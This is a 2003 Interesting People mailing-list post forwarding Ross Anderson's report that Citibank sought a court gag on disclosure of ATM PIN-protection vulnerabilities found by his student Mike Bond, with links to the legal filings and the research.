Interesting People mailing list archives

Previous By Date Next
Previous By Thread Next

Citibank tries to gag crypto bug disclosure

From: Dave Farber <dave () farber net>
Date: Thu, 20 Feb 2003 07:34:41 -0500

------ Forwarded Message
From: Brian Randell <Brian.Randell () newcastle ac uk>
Date: Thu, 20 Feb 2003 12:15:09 +0000
To: farber () cis upenn edu
Subject: Fwd: [open-source] Citibank tries to gag crypto bug disclosure

Dave:

I assume you've seen this, but just in case ...

cheers

Brian

PS I was at Monday's meeting at Microsoft research in Cambridge, in
honour of Roger Needham, at which Ross Anderson gave an excellent
about this work.




To: open-source () csl sri com
Subject: [open-source] Citibank tries to gag crypto bug disclosure
Date: Thu, 20 Feb 2003 09:58:47 +0000
From: Ross Anderson <Ross.Anderson () cl cam ac uk>
X-Spam-Status: No, score=0.5 threshold=8.0
X-Spam-Level: x
Sender: open-source-owner () csl sri com
Reply-To: Ross Anderson <Ross.Anderson () cl cam ac uk>
X-Newcastle-MailScanner: Found to be clean


Citibank is trying to get an order in the High Court today gagging
public disclosure of crypto vulnerabilities:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf

I have written to the judge opposing the order:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf

The background is that my student Mike Bond has discovered some really
horrendous vulnerabilities in the cryptographic equipment commonly
used to protect the PINs used to identify customers to cash machines:

    http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf

These vulnerabilities mean that bank insiders can almost trivially
find out the PINs of any or all customers. The discoveries happened
while Mike and I were working as expert witnesses on a `phantom
withdrawal' case.

The vulnerabilities are also scientifically interesting:

    http://cryptome.org/pacc.htm

For the last couple of years or so there has been a rising tide of
phantoms. I get emails with increasing frequency from people all over
the world whose banks have debited them for ATM withdrawals that they
deny making. Banks in many countries simply claim that their systems
are secure and so the customers must be responsible. It now looks like
some of these vulnerabilities have also been discovered by the bad
guys. Our courts and regulators should make the banks fix their
systems, rather than just lying about security and dumping the costs
on the customers.

Curiously enough, Citi was also the bank in the case that set US law
on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope
that's an omen, if not a precedent ...

Ross Anderson



-- 
School of Computing Science, University of Newcastle, Newcastle upon Tyne,
NE1 7RU, UK
EMAIL = Brian.Randell () newcastle ac uk   PHONE = +44 191 222 7923
FAX = +44 191 222 8232  URL = http://www.cs.ncl.ac.uk/~brian.randell/


------ End of Forwarded Message

-------------------------------------
You are subscribed as interesting-people () lists elistx com
To unsubscribe or update your address, click
  http://v2.listbox.com/member/?listname=ip

Archives at: http://www.interesting-people.org/archives/interesting-people/
Previous By Date Next
Previous By Thread Next

Current thread: